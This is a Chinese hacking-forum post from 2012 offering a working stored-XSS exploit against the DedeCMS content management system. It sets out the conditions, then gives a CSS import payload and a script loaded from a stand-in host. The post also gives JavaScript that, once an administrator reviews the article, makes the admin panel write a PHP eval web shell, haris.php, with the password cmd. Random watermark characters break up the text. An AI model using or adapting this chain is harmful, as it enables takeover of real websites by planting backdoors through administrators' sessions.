中国网络渗透测试联盟
标题:
dedecms xss oday通杀所有版本 可getshell
[打印本页]
作者:
admin
时间:
2012-9-15 13:56
标题:
dedecms xss oday通杀所有版本 可getshell
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
4 V# d& C" G3 F+ l6 h7 h: _
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
# i$ N5 G$ M8 F1 ?/ x9 Q8 f
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
7 z6 z9 ]7 e* c8 \
下面说说利用方法。
+ I+ S1 g/ i4 C+ l# A; w3 _ M* ~7 ]
条件有2个:
) J2 t$ F, g( u4 C4 P0 A& W
1.开启注册
5 y# r% x' y8 ]* B# x. H5 w
2.开启投稿
: T5 S: l% \1 F/ Y0 p0 Q5 T& b
注册会员----发表文章
$ m3 ?& `+ E# e1 m' P8 ]( ]9 r
内容填写:
8 [0 P5 L! E+ T) q
复制代码
$ M* h O; m1 T% g
<style>@im\port'\
http://xxx.com/xss.css';
</style>
* q' J* @1 N3 v
新建XSS.Css
4 Z: v) \& Y+ P. H6 E8 q
复制代码
0 P9 f& P F( L; b1 R* @
.body{
4 Q9 O2 b$ g" P0 P/ X! L3 |$ c
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
1 c7 P0 _8 H3 }" j h0 |% e) T
新建xss.js 内容为
' u# X. P8 ~: s; b0 M
复制代码
( ]4 Z) j0 K' `- C I5 R2 f
1.var request = false;
6 ?3 V; r% K: j% Y4 l1 r, ^
2.if(window.XMLHttpRequest) {
# R" c% j7 g/ v4 m1 `
3.request = new XMLHttpRequest();
" W# M% ?, U. U' U2 U, E3 b
4.if(request.overrideMimeType) {
- F6 ]9 n# f n! y# Y/ e
5.request.overrideMimeType('text/xml');
. y9 Q# y# w! S) z8 n) ?) S
6.}
# V0 S; A4 H0 v; u& M
7.} else if(window.ActiveXObject) {
% o! q9 O' b# a8 \( s
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
+ f8 t# O2 q# m" N, E9 I! t7 S
9.for(var i=0; i<versions.length; i++) {
2 e5 u9 X, P' e9 |) x {3 A4 T8 Z
10.try {
+ z7 t5 E. d6 S1 r; E
11.request = new ActiveXObject(versions);
. }: `! h0 _9 E; `
12.} catch(e) {}
) F; M- D* }- x) f% ^
13.}
% F- U5 ? _( y% G( T! W' W8 r& N
14.}
; u7 k, U% B$ A* Q, ?
15.xmlhttp=request;
) R! B; S8 E1 [
16.function getFolder( url ){
! A2 Y% e" O& V: _1 }9 D' T
17. obj = url.split('/')
* S" B. K3 s6 O, B9 k$ d( _% V
18. return obj[obj.length-2]
2 v* S! _$ ], V
19.}
& v3 y9 Y( F6 S7 v8 x2 H: i
20.oUrl = top.location.href;
1 X2 h% |- G5 I2 F) o
21.u = getFolder(oUrl);
5 H% Y% C4 u7 @3 H5 m
22.add_admin();
5 f# c% `% H1 k/ n$ F6 D
23.function add_admin(){
+ C, j% B$ @0 r3 I( d
24.var url= "/"+u+"/sys_sql_query.php";
* u% C1 j* q6 j! o' u& r! h
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
6 Z% n# T( L9 ~1 Q8 t
26.xmlhttp.open("POST", url, true);
( @4 ^9 a' g2 E% b
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
" M! {/ N0 y9 w* u8 V! q* _6 M
28.xmlhttp.setRequestHeader("Content-length", params.length);
$ n* a! L0 D8 v3 v% s# ~
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
9 ?% A+ C8 k$ H
30.xmlhttp.send(params);
' s9 f0 {" y6 x& ?9 T4 b3 E, a
31.}
6 d8 |( r' ?9 s0 }
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2